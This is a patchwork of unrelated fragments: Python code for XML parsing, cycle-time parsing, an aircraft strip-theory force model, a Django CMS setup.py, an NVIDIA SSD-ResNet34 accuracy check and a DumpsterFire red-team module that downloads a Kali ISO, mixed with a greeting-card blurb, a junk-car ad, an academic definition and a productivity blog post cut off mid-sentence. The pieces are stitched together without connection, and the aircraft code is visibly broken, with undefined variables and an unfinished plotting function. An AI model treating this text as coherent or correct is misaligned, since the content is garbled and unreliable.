lower=xml_to_dict(child) current.update(lower) if root.attrib: if current: if [x in current for x in root.attrib]: current.update(root.attrib) else: current.update({'attribs':root.attribs}) else: current= root.attrib if root.text and root.text.strip() != "": if current: if 'text' not in current: current['text']=root.text else: #you're really pushing here, pal current['xml_text']=root.text else: current=root.text return {root.tag:current} class CycleTimesParser(object): def __init__(self, path): if os.path.exists(path): self.path = path self.cycles = [] self.parse() else: raise os.error("file {0} cannot be found".format(path)) def parse(self): """ parse CycleTimes.txt and return ordered list of cycles CycleTimes.txt contains records: <date> <time> <barcode> <cycle> <info> one cycle contains a few records (defined by <cycle>) parser goes over records and saves the first record of each cycle as start time and the last record of each cycle as end time """ data = [] date_format = '%m/%d/%Y-%H:%M:%S.%f' with open(self.path, 'r') as file: cycle_times = file.readlines() # if file is empty, return if not cycle_times: return # first line is header, don't read it for cycle_line in cycle_times[1:]: # split line into strings cycle_list = cycle_line.split() cycle_time_obj = {} # parse datetime cycle_time_obj['datetime'] = datetime.strptime("{date}-{time}".format(date=cycle_list[0], time=cycle_list[1]), date_format) # parse cycle number cycle_time_obj['cycle'] = int(cycle_list[3]) # add object in the list data.append(cycle_time_obj) # take the first record as current cycle current_cycle = { 'cycle_number': data[0]['cycle'], 'start': data[0]['datetime'], 'end': data[0]['datetime'] } # compare each record with current cycle (except the first one) for record in data[1:]: # if we are at the same cycle if record['cycle'] == current_cycle['cycle_number']: # override end of cycle with current record current_cycle['end'] = record['datetime'] # if a new cycle starts else: # save previous cycle self.cycles.append(current_cycle) # initialize new current_cycle current_cycle = { 'cycle_number': record['cycle'], 'start': record['datetime'], 'end': record['datetime'] } # the last records is not saved inside the loop if current_cycle not in self.cycles: self.cycles.append(current_cycle)
Your Godson and his Wife are new parents now. Send them your congratulations on their newborn baby girl or boy with these lovely baby feet with elegant fonts on a brown and soft pink background. A sweet card to celebrate this big change in their lives.
from __future__ import print_function import numpy as np class forcecalc(object): def __init__(self): pass ##################--SETTERS--################## def setsolverparams(self, timestep, udot, vdot, wdot, pdot, qdot, rdot, steps, rho, g): # leapfrog integrator solver vars self.timestep_ = timestep self.udot_ = udot self.vdot_ = vdot self.wdot_ = wdot self.pdot_ = pdot self.qdot_ = qdot self.rdot_ = rdot # strip theory solver parameters self.steps_ = steps self.rho_ = rho self.g_ = g # set u value surface parameters def setuvals( self, U2Xvals, U2Yvals, U2Zvals, U2func): self.U2Xvals_ = U2Xvals self.U2Yvals_ = U2Yvals self.U2Zvals_ = U2Zvals self.U2func_ = U2func # set aircraft parameters def setacparams(self, m, Ixx, Iyy, Izz, proprad, fuserad, x_cg, CD0_b, dCDb_dB, dCDb_dA, alphamin, alphamax): self.m_ = m self.Ixx_ = Ixx self.Iyy_ = Iyy self.Izz_ = Izz # fuselage geometry self.proprad_ = proprad self.fuserad_ = fuserad self.x_cg_ = x_cg # fuselage drag values self.CD0_b_ = CD0_b self.dCDb_dB_ = dCDb_dB self.dCDb_dA_ = dCDb_dA # stall points self.alphamin_ = alphamin*np.pi/180 self.alphamax_ = alphamax*np.pi/180 # set wing geometry def setwingparams( self, wspan, winc, rc_w, tc_w, qtc_sweep_w, wing_root_le_x, dCL_da_w, dCL_de_w, CL0_w, CD0_w, Y_w, y_w, e_w): self.wspan_ = wspan self.winc_ = winc*np.pi/180 self.rc_w_ = rc_w self.tc_w_ = tc_w self.qtc_sweep_w_ = qtc_sweep_w*np.pi/180 self.wing_root_le_x_ = wing_root_le_x # wing lift curve slope values self.dCL_da_w_ = dCL_da_w self.dCL_de_w_ = dCL_de_w self.CL0_w_ = CL0_w self.CD0_w_ = CD0_w # wing control surface y placement (start and end)' self.Y_w_ = Y_w self.y_w_ = y_w # oswald efficiency factor wing' self.e_w_ = e_w # set horizontal tail geometry def sethtailparams( self, htspan, htinc, rc_ht, tc_ht, qtc_sweep_ht, htail_root_le_x, dCL_da_ht, dCL_de_ht, CL0_ht, CD0_ht, Y_ht, y_ht, e_ht): self.htspan_ = htspan self.htinc_ = htinc*np.pi/180 self.rc_ht_ = rc_ht self.tc_ht_ = tc_ht self.qtc_sweep_ht_ = qtc_sweep_ht*np.pi/180 self.htail_root_le_x_ = htail_root_le_x # horizontal tailplane lift-curve slope values self.dCL_da_ht_ = dCL_da_ht self.dCL_de_ht_ = dCL_de_ht self.CL0_ht_ = CL0_ht self.CD0_ht_ = CD0_ht # htail control surface y placement (start and end) self.Y_ht_ = Y_ht self.y_ht_ = y_ht # oswald efficiency factor htail self.e_ht_ = e_ht # set vertical tail geometry def setvtailparams( self, vtspan, vtinc, rc_vt, tc_vt, qtc_sweep_vt, vtail_root_le_x, dCL_da_vt, dCL_de_vt, CL0_vt, CD0_vt, Y_vt, y_vt, e_vt): self.vtspan_ = vtspan self.vtinc_ = vtinc*np.pi/180 self.rc_vt_ = rc_vt self.tc_vt_ = tc_vt self.qtc_sweep_vt_ = qtc_sweep_vt*np.pi/180 self.vtail_root_le_x_ = vtail_root_le_x # wing lift curve slope values self.dCL_da_vt_ = dCL_da_vt self.dCL_de_vt_ = dCL_de_vt self.CL0_vt_ = CL0_vt self.CD0_vt_ = CD0_vt # wing control surface y placement (start and end) self.Y_vt_ = Y_vt self.y_vt_ = y_vt # oswald efficiency factor wing self.e_vt_ = e_vt #build wing geometry def buildwing(self): span = self.wspan_ rc = self.rc_w_ tc = self.tc_w_ steps = self.steps_ rootx = self.wing_root_le_x_ self.b_w_ = span/2 self.cbar_w_ = (rc+tc)/2 self.Sref_w_ = self.cbar_w_*span self.AR_w_ = span**2/self.Sref_w_ self.w_el_ = self.b_w_/steps self.wing_ = np.linspace(self.w_el_/2, (span-self.w_el_)/2, steps) self.chord_w_ = self.chord(self.wing_, span, self.Sref_w_, rc, tc) self.le_sweep_w_ = np.arctan2((self.b_w_*np.tan(self.qtc_sweep_w_)+0.25*(rc-tc)), self.b_w_) self.x_ac_w_ = rootx+0.25*self.chord_w_+np.multiply(np.tan(self.le_sweep_w_), self.wing_) # build horizontal tail geometry def buildhoztail(self): span = self.htspan_ rc = self.rc_ht_ tc = self.tc_ht_ steps = self.steps_ rootx = self.htail_root_le_x_ self.b_ht_ = span/2 self.cbar_ht_ = (rc+tc)/2 self.Sref_ht_ = self.cbar_ht_*span self.AR_ht_ = span**2/self.Sref_ht_ self.ht_el_ = self.b_ht_/steps self.htail_ = np.linspace(self.ht_el_/2, (span-self.ht_el_)/2, steps) self.chord_ht_ = self.chord(self.htail_, span, self.Sref_ht_, rc, tc) self.le_sweep_ht_ = np.arctan2((self.b_ht_*np.tan(self.qtc_sweep_ht_)+0.25*(rc-tc)), self.b_ht_) self.x_ac_ht_ = rootx+0.25*self.chord_ht_+np.multiply(np.tan(self.le_sweep_ht_), self.htail_) # build vertical tail geometry def buildvertail(self): span = self.vtspan_ rc = self.rc_vt_ tc = self.tc_vt_ steps = self.steps_ rootx = self.vtail_root_le_x_ self.cbar_vt_ = (rc+tc)/2 self.Sref_vt_ = self.cbar_vt_*span self.AR_vt_ = span**2/self.Sref_vt_ self.vt_el_ = span/steps self.vtail_ = np.linspace(self.vt_el_/2, (span-self.vt_el_)/2, steps) self.chord_vt_ = self.chord(self.vtail_, span, self.Sref_vt_, rc, tc) self.le_sweep_vt_ = np.arctan2((span*np.tan(self.qtc_sweep_vt_)+0.25*(rc-tc)), span) self.x_ac_vt_ = rootx+0.25*self.chord_vt_+np.multiply(np.tan(self.le_sweep_vt_), self.vtail_) # build fuselage and prop geometry def buildfuseandprop(self): self.A_b_ref_ = np.pi*self.fuserad_**2 self.diskA_ = np.pi*self.proprad_**2 # build aircraft geometry to be used for forcecalc def buildgeom(self): self.buildwing() self.buildhoztail() self.buildvertail() self.buildfuseandprop() # calculate body forces acting on the aircraft using strip theory def forcecalc( self, power, u, v, w, p, q, r, aileron, elevator, rudder): # calc thrust force thrust = self.thrustcalc(power, u) # creating left and right wings to keep axes consistent lw = -np.flip(self.wing_, 0) rw = self.wing_ # calc local velocity components for each strip on the wing (u,v,w) u_w_lw = u+lw*r u_w_rw = u+rw*r v_w = v*np.ones(np.size(rw)) w_w_lw = w+p*lw-q*(self.x_cg_-self.x_ac_w_) w_w_rw = w+p*rw-q*(self.x_cg_-self.x_ac_w_) # calc local velocity components for each strip on the horizontal tail (u,v,w)' lht = -np.flip(self.htail_, 0) rht = self.htail_ u_ht_lht = u+lht*r u_ht_rht = u+rht*r v_ht = v-r*(self.x_cg_-self.x_ac_ht_) w_ht_lht = w+p*lht-q*(self.x_cg_-self.x_ac_ht_) w_ht_rht = w+p*rht-q*(self.x_cg_-self.x_ac_ht_) # calc local velocity components for each strip on the vertical tail (u,v,w) u_vt = u-self.vtail_*q v_vt = v+p*self.vtail_-r*(self.x_cg_-self.x_ac_vt_) w_vt = w-q*(self.x_cg_-self.x_ac_vt_) # calc local local angles of attack for each strip on the wings, ht, vt, including wing incidence alpha_lw = np.arctan2(w_w_lw, u_w_lw)+self.winc_*np.pi/180 alpha_rw = np.arctan2(w_w_rw, u_w_rw)+self.winc_*np.pi/180 alpha_lht = np.arctan2(w_ht_lht, u_ht_lht)+self.htinc_*np.pi/180 alpha_rht = np.arctan2(w_ht_rht, u_ht_rht)+self.htinc_*np.pi/180 alpha_vt = np.arcsin(v_vt/np.sqrt(u_vt**2+v_vt**2+w_vt**2)) # calc local local lift coefficients for each strip on the wings, ht, vt CL_lw = self.CL(lw, self.dCL_da_w_, alpha_lw, self.CL0_w_, -aileron, self.dCL_de_w_, -self.Y_w_, -self.y_w_) CL_rw = self.CL(rw, self.dCL_da_w_, alpha_rw, self.CL0_w_, aileron, self.dCL_de_w_, self.Y_w_, self.y_w_) CL_lht = self.CL(lht, self.dCL_da_ht_, alpha_lht, self.CL0_ht_, elevator, self.dCL_de_ht_, self.Y_ht_, self.y_ht_) CL_rht = self.CL(rht, self.dCL_da_ht_, alpha_rht, self.CL0_ht_, elevator, self.dCL_de_ht_, self.Y_ht_, self.y_ht_) CL_vt = self.CL(self.vtail_, self.dCL_da_vt_, alpha_vt, self.CL0_vt_, rudder, self.dCL_de_vt_, self.Y_vt_, self.y_vt_) # calc local local moment coefficients for each strip on the wings, ht, vt #CM_lw = self.CM(lw, self.dCM_da_w_, alpha_lw, self.CM0_w_, -aileron, self.dCM_de_w_, self.Y_w_, self.y_w_) #CM_rw = self.CM(rw, self.dCM_da_w_, alpha_lw, self.CM0_w_, aileron, self.dCM_de_w_, self.Y_w_, self.y_w_) #CM_lht = self.CM(lht, self.dCM_da_ht_, alpha_lw, self.CM0_ht_, elevator, self.dCM_de_w_, self.Y_w_, self.y_w_) #CM_rht = self.CM(rht, self.dCM_da_ht_, alpha_lw, self.CM0_ht_, elevator, self.dCM_de_w_, self.Y_w_, self.y_w_) #CM_vt = self.CM(self.vtail_, self.dCM_da_vt_, alpha_lw, self.CM0_vt_, rudder, self.dCM_de_w_, self.Y_w_, self.y_w_) # calc constant values K1 = self.AR_w_*self.e_w_*np.pi K2 = self.AR_ht_*self.e_ht_*np.pi K3 = self.AR_vt_*self.e_vt_*np.pi # calc drag coefficients for wings, ht, vt CD_lw = self.CD0_w_+CL_lw**2/K1 CD_rw = self.CD0_w_+CL_rw**2/K1 CD_lht = self.CD0_ht_+CL_lht**2/K2 CD_rht = self.CD0_ht_+CL_rht**2/K2 CD_vt = self.CD0_vt_+CL_vt**2/K3 # calc local velocities Vsq_lw = u_w_lw**2+v_w**2+w_w_lw**2 Vsq_rw = u_w_rw**2+v_w**2+w_w_rw**2 Vsq_lht = u_ht_lht**2+v_ht**2+w_ht_lht**2 Vsq_rht = u_ht_rht**2+v_ht**2+w_ht_rht**2 Vsq_vt = u_vt**2+v_vt**2+w_vt**2 # constants, elemental areas for wings, ht, vt K = 0.5*self.rho_ A_w = self.w_el_*self.chord_w_ A_ht = self.ht_el_*self.chord_ht_ A_vt = self.vt_el_*self.chord_vt_ # calc lift force in wings, ht, vt LIFT_LW = CL_lw*K*Vsq_lw*np.flip(A_w, 0) LIFT_RW = CL_rw*K*Vsq_rw*A_w LIFT_LHT = CL_lht*K*Vsq_lht*np.flip(A_ht, 0) LIFT_RHT = CL_rht*K*Vsq_rht*A_ht LIFT_VT = CL_vt*K*Vsq_vt*A_vt # calc drag force in wings, ht, vt DRAG_LW = CD_lw*K*Vsq_lw*np.flip(A_w, 0) DRAG_RW = CD_rw*K*Vsq_rw*A_w DRAG_LHT = CD_lht*K*Vsq_lht*np.flip(A_ht, 0) DRAG_RHT = CD_rht*K*Vsq_rht*A_ht DRAG_VT = CD_vt*K*Vsq_vt*A_vt # calc pitching moments in wings, ht, vt #PITCH_LW = CM_lw*K*Vsq_lw*np.flip(A_ht, 0)*np.flip(self.chord_w_, 0) #PITCH_RW = CM_rw*K*Vsq_rw*A_w*self.chord_w_ #PITCH_LHT = CM_lht*K*Vsq_lht*np.flip(A_ht, 0)*np.flip(self.chord_ht_, 0) #PITCH_RHT = CM_rht*K*Vsq_rht*A_ht*self.chord_ht_ #PITCH_VT = CM_vt*K*Vsq_vt*A_vt*self.chord_vt_ # total pitching moment due to lift and sweep' #TOTAL_PITCH = PITCH_LW+PITCH_RW+PITCH_LHT+PITCH_RHT+PITCH_VT # calc force in body X direction in wings, ht, vt LW_X = LIFT_LW*np.sin(alpha_lw)-DRAG_LW*np.cos(alpha_lw) RW_X = LIFT_RW*np.sin(alpha_rw)-DRAG_RW*np.cos(alpha_rw) LHT_X = LIFT_LHT*np.sin(alpha_lht)-DRAG_LHT*np.cos(alpha_lht) RHT_X = LIFT_RHT*np.sin(alpha_rht)-DRAG_RHT*np.cos(alpha_rht) VT_X = LIFT_VT*np.sin(alpha_vt)-DRAG_VT*np.cos(alpha_vt) # calc force in body Y direction in wings, ht, vt VT_Y = LIFT_VT*np.cos(alpha_vt)+DRAG_VT*np.sin(alpha_vt) # calc force in body Z direction in wings, ht, vt LW_Z = LIFT_LW*np.cos(alpha_lw)+DRAG_LW*np.sin(alpha_lw) RW_Z = LIFT_RW*np.cos(alpha_rw)+DRAG_RW*np.sin(alpha_rw) LHT_Z = LIFT_LHT*np.cos(alpha_lht)+DRAG_LHT*np.sin(alpha_lht) RHT_Z = LIFT_RHT*np.cos(alpha_rht)+DRAG_RHT*np.sin(alpha_rht) # Total body forces XF = float(thrust)+np.sum(LW_X)+np.sum(RW_X)+np.sum(LHT_X)+np.sum(RHT_X)+np.sum(VT_X) YF = np.sum(VT_Y) ZF = np.sum(LW_Z)+np.sum(RW_Z)+np.sum(LHT_Z)+np.sum(RHT_Z) # Moments about body X, Y, Z axes LM = np.sum(-lw*LW_Z-rw*RW_Z)+np.sum(-lht*LHT_Z-rht*RHT_Z)+np.sum(self.vtail_*VT_Y) MM = np.sum((LW_Z+RW_Z)*(self.x_cg_-self.x_ac_w_))+np.sum((LHT_Z+RHT_Z)*(self.x_cg_-self.x_ac_ht_))+\ np.sum(self.vtail_*VT_X)#+np.sum(TOTAL_PITCH) NM = np.sum(-rw*RW_X-lw*LW_X)+np.sum(-rht*RHT_X-lht*LHT_X) print(XF, YF, ZF, LM, MM, NM) return [XF, YF, ZF, LM, MM, NM] # uses an interpolation function to calculate the exhaust velocity and thrust of the prop using momentum theory def thrustcalc( self, power, u): if power>0: u2 = self.U2func(power, u) force = 0.5*rho*diskA*(u2**2-u**2) else: force = 0 return force # calculates the chord of the wing at each point in its station def chord( self, wing, span, area, rc, tc): k = tc/rc A = 2*area/((1+k)*span) B = 1*(1-k)/span res = A*(1-B*wing) return res # calculates the lift coefficient at each station along the wing def CL( self, wing, dCL_da, alpha, CL0, displacement, dCL_de, pos1, pos2): aileronCL = self.heaviside(wing, pos1, pos2) stalled = (alpha >= self.alphamin_) & (alpha <= self.alphamax_) res = stalled.astype(int)*(CL0+dCL_da*alpha+aileronCL*dCL_de*displacement) return res # calculates the moment coefficient at each station along the wing def CM( self, wing, dCM_da, alpha, CM0, displacement, dCM_de, pos1, pos2): aileronCL = self.heaviside(wing, pos1, pos2) stalled = (alpha >= alphamin) & (alpha <= alphamax) res = stalled.astype(int)*(CM0+dCM_da*alpha+aileronCL*dCM_de*displacement) return res # heaviside operator, returns a vector of 1s and 0s to make array operations easier def heaviside( self, wing, pos1, pos2): res = (wing >= pos1) & (wing <= pos2) return res.astype(int) # leap frog integrator to calculate accelerations velocities in the body frame, and calc displacement' # in the inertial frame def nlti( self, u, v, w, p, q, r, x, y, z, phi, theta, psi, A): # linear accelerations in the body frame du_dt = float(A[0]/self.m_-self.g_*np.sin(theta)-q*w+r*v) dv_dt = float(A[1]/self.m_+self.g_*np.cos(theta)*np.sin(phi)-r*u+p*w) dw_dt = float(A[2]/self.m_+self.g_*np.cos(theta)*np.cos(phi)-p*v+q*u) # angular accelerations in the body frame dp_dt = float(A[3]/self.Ixx_-(self.Izz_-self.Iyy_)/self.Ixx_*q*r) dq_dt = float(A[4]/self.Iyy_-(self.Ixx_ - self.Izz_)/self.Iyy_*r*p) dr_dt = float(A[5]/self.Izz_-(self.Iyy_ - self.Ixx_)/self.Izz_*p*q) # half time step representation of linear velocities u += 0.5*(self.udot_+du_dt)*self.timestep_ v += 0.5*(self.vdot_+dv_dt)*self.timestep_ w += 0.5*(self.wdot_+dw_dt)*self.timestep_ # half time step representation of angular velocities p += 0.5*(self.pdot_+dp_dt)*self.timestep_ q += 0.5*(self.qdot_+dq_dt)*self.timestep_ r += 0.5*(self.rdot_+dr_dt)*self.timestep_ # using cosine matrices to convert velocities and accelerations to inertial frame # (is there a better way to handle accelerations?) I = self.lindcm([-phi, -theta, -psi], [du_dt, dv_dt, dw_dt]) X = self.lindcm([-phi, -theta, -psi], [u, v, w]) J = self.angdcm([-phi, -theta, -psi], [dp_dt, dq_dt, dr_dt]) W = self.angdcm([-phi, -theta, -psi], [p, q, r]) # linear displacements in the inertial frame x += X[0]*self.timestep_+0.5*I[0]*self.timestep_**2 y += X[1]*self.timestep_+0.5*I[1]*self.timestep_**2 z += X[2]*self.timestep_+0.5*I[2]*self.timestep_**2 # angular displacements in the inertial frame phi += W[0]*self.timestep_+0.5*J[0]*self.timestep_**2 theta += W[1]*self.timestep_+0.5*J[1]*self.timestep_**2 psi += W[2]*self.timestep_+0.5*J[2]*self.timestep_**2 # store velocities so that in the next step, the half time step velocities can be calculated' self.udot_ = du_dt self.vdot_ = dv_dt self.wdot_ = dw_dt self.pdot_ = dp_dt self.qdot_ = dq_dt self.rdot_ = dr_dt return [u, v, w, p, q, r, x, y, z, phi, theta, psi] # direction cosine matrix function def lindcm( self, A, B): phi = A[0] theta = A[1] psi = A[2] DCM = np.array([[np.cos(theta)*np.cos(psi), np.cos(theta)*np.sin(psi), -np.sin(theta)], [np.sin(phi)*np.sin(theta)*np.cos(psi)-np.cos(phi)*np.sin(psi), np.sin(phi)*np.sin(theta)*np.sin(psi)+np.cos(phi)*np.cos(psi), np.sin(phi)*np.cos(theta)], [np.cos(phi)*np.sin(theta)*np.cos(psi)+np.sin(phi)*np.sin(psi), np.cos(phi)*np.sin(theta)*np.sin(psi)-np.sin(phi)*np.cos(psi), np.cos(phi)*np.cos(theta)]]) transform = np.dot(np.transpose(DCM), np.array(B)) return transform # angular cosine matrix function def angdcm( self, A, B): phi = A[0] theta = A[1] ACM = np.array([[1, np.sin(phi)*np.tan(theta), np.cos(phi)*np.tan(theta)], [0, np.cos(phi), -np.sin(phi)], [0, np.sin(phi)/np.cos(theta), np.cos(phi)/np.cos(theta)]]) W = np.dot(ACM, np.array(B)) return W # calculate body force and moment coefficients def coefs( self, u, v, w, A): XF, YF, ZF = A[0], A[1], A[2] LM, MM, NM = A[3], A[4], A[5] q = 0.5*self.rho_*(u**2+v**2+w**2) CX = XF/q/self.Sref_w_ CY = YF/q/self.Sref_w_ CZ = ZF/q/self.Sref_w_ CL = LM/q/self.Sref_w_/self.wspan_ CM = MM/q/self.Sref_w_/self.cbar_w_ CN = NM/q/self.Sref_w_/self.wspan_ return [CX, CY, CZ, CL, CM, CN] def plotaircraft( ax, X): x, y, z = X[0:3] # generate geometry using sizing # xltedge = yltedge = np.linspace(-self.wspan/2, 0, 50) zltedge = np.zeros_like(yltedge) # xrtedge = yrtedge = np.linspace(0, self.wspan/2, 50) zrtedge = np.zeros_like(yrtedge) xltip = np.linspace(0, tc_w,50) # yltip zltip = np.zeros_like(xrtip) xrtip = np.linspace(0, tc_w,50) # yrtip # xlledge = # xrledge = # ylledge = # yrledge = # rotate geometry # plot geometry
Call me anytime, anywhere, if you live anywhere near Lowry and I’ll make you the highest cash offer I can, for your car. The towing is FREE and I’ll pick-up your car within 24 hours. I'm available everyday - 7 days a week and I’ve got to buy at least 10 cars a day. Any year, make, model, or condition. It doesn’t matter whether it runs or drives. I’ve bought cars with a tree through the roof, with the engine in the trunk, vehicles with no doors & windows, some sitting in driveways and garages – some didn't even start for years. If your car is broken down anywhere near Lowry, sitting at the mechanic's shop, too expensive to fix, or the engine or transmission is gone…give me a call at 1-877-445-0780 & ask for crazy Jim... 'cause I've got cash to spend and I'm ready to buy your car now!
#!/usr/bin/python # # Filename: # # Version: 1.0.0 # # Author: Joe Gervais (TryCatchHCF) # # Summary: # # Part of the DumpsterFire Toolset. See documentation at https://github.com/TryCatchHCF/DumpsterFire # # # Description: # # # Example: # # import os, sys, urllib from FireModules.fire_module_base_class import * class download_kali( FireModule ): def __init__(self): self.commentsStr = "FileDownloads/download_kali" def __init__(self, moofStr): self.moofStr = moofStr self.commentsStr = "FileDownloads/download_kali" return; def Description( self ): self.Description = "Downloads Kali distro to local directory" return self.Description def Configure( self ): self.mDirectoryPath = raw_input( "Enter Directory Path to download files into: " ) return def GetParameters( self ): return self.mDirectoryPath def SetParameters( self, parametersStr ): self.mDirectoryPath = parametersStr return def ActivateLogging( self, logFlag ): print self.commentsStr + ": Setting Logging flag!" print logFlag return def Ignite( self ): self.filepath = self.mDirectoryPath + "/" + 'kali.iso' print self.commentsStr + ": Downloading Kali to: " + self.filepath urllib.urlretrieve( 'http://cdimage.kali.org/kali-2017.2/kali-linux-2017.2-amd64.iso', self.filepath ) return
A social constructionist theory that emerged in 1980s and has seen significant development in the 21st century. It considers how people negotiate and take up their place in any given context. Positioning Theory (Pinnegar & Murphy, 2011) addresses how the individual subjectively perceives his interrelations with others. It is a narrative theory developed in the early 1990s in the sociological-interpretive field, which also expanded to education, teaching, and teacher training. Pinnegar, S., & Murphy, M. S. (2011): Teacher educator identity emerging within a teacher educator collective. Studying Teacher Education, 7:2, 211-213.
import os import imp try: imp.find_module('setuptools') except ImportError: from ez_setup import use_setuptools use_setuptools() from setuptools import setup, find_packages README = open('README.rst').read() setup( name = "goscalecms", version = __import__('goscale').__version__, packages = find_packages(), author = "Evgeny Demchenko", author_email = "[email protected]", description = "GoScale CMS is an extension of Django CMS. It's a set of unique plugins and useful tools for Django CMS that makes it very powerful by seamlessly integrating content from 3rd party websites to make mashups.", long_description = README, license = "BSD", keywords = "goscale cms django themes content management system mashup google ajax", url = "https://github.com/sternoru/goscalecms", include_package_data = True, classifiers=[ "Development Status :: 3 - Alpha", "Topic :: Internet :: WWW/HTTP :: Site Management", "Environment :: Web Environment", "Framework :: Django", "Intended Audience :: Developers", "Natural Language :: English", "Natural Language :: French", "Natural Language :: Russian", "Programming Language :: Python", "Programming Language :: JavaScript", "License :: OSI Approved :: BSD License", ], install_requires = [ "pytz", "unidecode", "BeautifulSoup", "feedparser", "gdata", "python-dateutil", "simplejson", "Django>=1.4,<1.6", "django-cms==2.4", ] )
New Research Methodology Developed by Skeptics! Medical Errors? What medical errors! Dear . Alan Nice drawing .
#!/usr/bin/env python3 # Copyright (c) 2020, NVIDIA CORPORATION. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import ctypes import os, sys # The plugin .so file has to be loaded at global scope and before `import torch` to avoid cuda version mismatch. NMS_OPT_PLUGIN_LIBRARY="build/plugins/NMSOptPlugin/libnmsoptplugin.so" if not os.path.isfile(NMS_OPT_PLUGIN_LIBRARY): raise IOError("{}\n{}\n".format( "Failed to load library ({}).".format(NMS_OPT_PLUGIN_LIBRARY), "Please build the NMS Opt plugin." )) ctypes.CDLL(NMS_OPT_PLUGIN_LIBRARY) import argparse import json import time sys.path.insert(0, os.getcwd()) from code.common.runner import EngineRunner, get_input_format from code.common import logging import code.common.arguments as common_args import numpy as np import torch import tensorrt as trt from pycocotools.coco import COCO from pycocotools.cocoeval import COCOeval def run_SSDResNet34_accuracy(engine_file, batch_size, num_images, verbose=False, output_file="build/out/SSDResNet34/dump.json"): threshold = 0.20 runner = EngineRunner(engine_file, verbose=verbose) input_dtype, input_format = get_input_format(runner.engine) if input_dtype == trt.DataType.FLOAT: format_string = "fp32" elif input_dtype == trt.DataType.INT8: if input_format == trt.TensorFormat.LINEAR: format_string = "int8_linear" elif input_format == trt.TensorFormat.CHW4: format_string = "int8_chw4" image_dir = os.path.join(os.getenv("PREPROCESSED_DATA_DIR", "build/preprocessed_data"), "coco/val2017/SSDResNet34", format_string) val_annotate = os.path.join(os.getenv("PREPROCESSED_DATA_DIR", "build/preprocessed_data"), "coco/annotations/instances_val2017.json") coco = COCO(annotation_file=val_annotate) image_ids = coco.getImgIds() cat_ids = coco.getCatIds() # Class 0 is background cat_ids.insert(0, 0) num_images = min(num_images, len(image_ids)) logging.info("Running validation on {:} images. Please wait...".format(num_images)) coco_detections = [] batch_idx = 0 for image_idx in range(0, num_images, batch_size): end_idx = min(image_idx + batch_size, num_images) img = [] img_sizes = [] for idx in range(image_idx, end_idx): image_id = image_ids[idx] img.append(np.load(os.path.join(image_dir, coco.imgs[image_id]["file_name"] + ".npy"))) img_sizes.append([coco.imgs[image_id]["height"], coco.imgs[image_id]["width"]]) img = np.stack(img) start_time = time.time() outputs = runner([img], batch_size=batch_size) trt_detections = outputs[0] if verbose: logging.info("Batch {:d} >> Inference time: {:f}".format(batch_idx, time.time() - start_time)) for idx in range(0, end_idx - image_idx): keep_count = trt_detections[idx * (200 * 7 + 1) + 200 * 7].view('int32') trt_detections_batch = trt_detections[idx * (200 * 7 + 1):idx * (200 * 7 + 1) + keep_count * 7].reshape(keep_count, 7) image_height = img_sizes[idx][0] image_width = img_sizes[idx][1] for prediction_idx in range(0, keep_count): loc = trt_detections_batch[prediction_idx, [2, 1, 4, 3]] label = trt_detections_batch[prediction_idx, 6] score = float(trt_detections_batch[prediction_idx, 5]) bbox_coco_fmt = [ loc[0] * image_width, loc[1] * image_height, (loc[2] - loc[0]) * image_width, (loc[3] - loc[1]) * image_height, ] coco_detection = { "image_id": image_ids[image_idx + idx], "category_id": cat_ids[int(label)], "bbox": bbox_coco_fmt, "score": score, } coco_detections.append(coco_detection) batch_idx += 1 output_dir = os.path.dirname(output_file) if not os.path.exists(output_dir): os.makedirs(output_dir) with open(output_file, "w") as f: json.dump(coco_detections, f) cocoDt = coco.loadRes(output_file) eval = COCOeval(coco, cocoDt, 'bbox') eval.params.imgIds = image_ids[:num_images] eval.evaluate() eval.accumulate() eval.summarize() map_score = eval.stats[0] logging.info("Get mAP score = {:f} Target = {:f}".format(map_score, threshold)) return (map_score >= threshold * 0.99) def main(): args = common_args.parse_args(common_args.ACCURACY_ARGS) logging.info("Running accuracy test...") run_SSDResNet34_accuracy(args["engine_file"], args["batch_size"], args["num_samples"], verbose=args["verbose"]) if __name__ == "__main__": main()
‘Productivity’ is one term that every individual, as an efficient resource; and a manager, as an effective leader; should expect from oneself and the team. Time is money and making efficient use of time will not only enable you to gain more, but as a team you can achieve higher goals. Productivity is nothing but doing things more efficiently, timely and getting most of your time. There are different sets of people in an office atmosphere. Some like to finish their work before their day ends while others are bound to procrastinate. In such a scenario, how will you ensure that all the team members are on the same page? As an efficient individual, how will you ensure that all your roles, responsibilities and tasks are organised and managed effectively? Although measuring productivity and its evaluation process for each and every role is different, but the basic format and underlying process of designing your work-day are the same across all job roles. Considering the growing demand for improvement in productivity in small companies to large business houses, we thought we will list some of the tips and tricks to maximise productivity in your workplace. 1. Plan in Advance, never hurts! Whether you are a small company or a large business house; planning is the first step for productivity. The common notion or misunderstanding among people is that productivity is constantly being busy, crunching numbers or chasing targets. This misconception just leads to ‘getting less done’. Boost your productivity with proper planning and have a to-do list for each day. Setting up tools in your workplace will reduce ad-hoc tasks and bring in every team member to a centralised platform. With the help of such tools you can not only align team, assign tasks and allocate timeline, but also ensure the quality of work and generate evaluation reports. Thanks to the SaaS uprising in the past decade that has given birth to several pay-as-you-go time tracking tools like Rescue Time, beautiful calendars like Cal, conversational email tools like Mail-time and team productivity tools like Gridle; you can now have them up and running in no-time!Thanks to the SaaS uprising in the past decade that has given birth to several pay-as-you-go time tracking tools like Rescue Time, beautiful calendars like Cal, conversational email tools like Mail-time and team productivity tools like Gridle; you can now have them up and running in no-time! Why would you call a team meeting for a status update? Or involve everyone for trivial decision making? We all love to hate meetings and get this straight: A 1 hour meeting of 10 people is essentially a 10-hour meeting! And more importantly, 7 in 10 people believe that meetings are unproductive. “If you had to identify, in one word, the reason why the human race has not achieved, and never will achieve, its full potential, that word would be meetings.” — ­Dave Barry, Pulitzer prize winning columnist. When it comes to assigning resources, it is pointless to waste time of other people in the discussion. Just add those resources who are essential for the task. Define a plan of action and get things grooving. This will help you to efficiently utilise the time of all the resources and scale up your expectations. 4. Great Time to Automate; because, why not? Automating the regular processes will not only make your delegation simple but also easy for your subordinates and team to understand. When you know how to manage and team has a clear vision of the path to follow, your productivity scales up. Zapier has been the go-to platform to automate things! 5. Define a Working 